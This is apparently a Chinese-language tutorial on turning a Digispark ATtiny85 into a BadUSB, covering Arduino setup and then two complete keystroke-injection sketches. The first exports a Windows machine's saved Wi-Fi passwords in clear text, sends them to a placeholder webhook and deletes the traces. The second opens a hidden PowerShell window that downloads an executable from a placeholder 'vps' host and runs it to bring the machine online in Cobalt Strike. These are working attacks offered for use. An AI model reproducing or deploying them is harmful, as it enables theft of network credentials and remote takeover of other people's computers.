环境配置

arduino 1.8.4

开发板管理网址:https://raw.githubusercontent.com/digistump/arduino-boards-index/master/package_digistump_index.json

alt

开发板管理器:Digistump AVR Boards

alt

安装驱动:https://github.com/digistump/digistumparduino/releases

alt

payloads

各种payloads:https://github.com/MTK911/Attiny85

烧录点击上传即可,之后根据提示插入badusb:

alt

窃取wifi密码:

#include "DigiKeyboard.h"

void setup() {
  pinMode(1, OUTPUT); //LED on Model A 
}

void loop() {
  DigiKeyboard.update();
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(3000);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //start run
  DigiKeyboard.delay(100);
  DigiKeyboard.println("cmd");
  DigiKeyboard.delay(500);
  DigiKeyboard.println("cd %temp%"); //Jumping to temporary dir
  DigiKeyboard.delay(300);  
  DigiKeyboard.println("netsh wlan export profile key=clear"); //grabbing all the saved wifi passwd and saving them in temporary dir
  DigiKeyboard.delay(2000);  
  DigiKeyboard.println("powershell Select-String -Path WLAN*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS"); //Extracting all password and saving them in Wi-Fi-Pass file in temporary dir
  DigiKeyboard.delay(1000);  
  DigiKeyboard.println("powershell Invoke-WebRequest -Uri your-webhook-website -Method POST -InFile Wi-Fi-PASS"); //Submitting all passwords on hook
  DigiKeyboard.delay(2000);  
  DigiKeyboard.println("del WLAN-* /s /f /q"); //cleaning up all the mess
  DigiKeyboard.delay(1000);  
  DigiKeyboard.println("exit");
  DigiKeyboard.delay(100);  
  digitalWrite(1, HIGH); //turn on led when program finishes
  DigiKeyboard.delay(10000);
  digitalWrite(1, LOW); 
  DigiKeyboard.delay(5000);
}

cs上线:

#include "DigiKeyboard.h"

void setup() {
  pinMode(1, OUTPUT); //LED on Model A 
}

void loop() {
  const char* download_url = "http://vps/artifact2.exe";
  
  DigiKeyboard.update();
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(3000);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //start run
  DigiKeyboard.delay(100);
  DigiKeyboard.println("cmd");
  DigiKeyboard.delay(500);
  DigiKeyboard.println("cd %temp%"); //Jumping to temporary dir
  DigiKeyboard.delay(300);  
  
  DigiKeyboard.print("powershell -WindowStyle Hidden -C \"$u='");
  DigiKeyboard.print(download_url);
  DigiKeyboard.print("';Invoke-WebRequest -Uri $u -OutFile \"something.exe\";Start-Process -FilePath \"something.exe\";\"");
  DigiKeyboard.println("");
  
  DigiKeyboard.println("exit");
  DigiKeyboard.delay(100);  
  digitalWrite(1, HIGH); //turn on led when program finishes
  DigiKeyboard.delay(10000);
  digitalWrite(1, LOW); 
  DigiKeyboard.delay(5000);
}

参考资料

https://ares-x.com/2018/01/17/%E4%BD%BF%E7%94%A8Digispark%E5%88%B6%E4%BD%9C%E4%B8%80%E4%B8%AA%E7%AE%80%E5%8D%95%E7%9A%84BadUSB/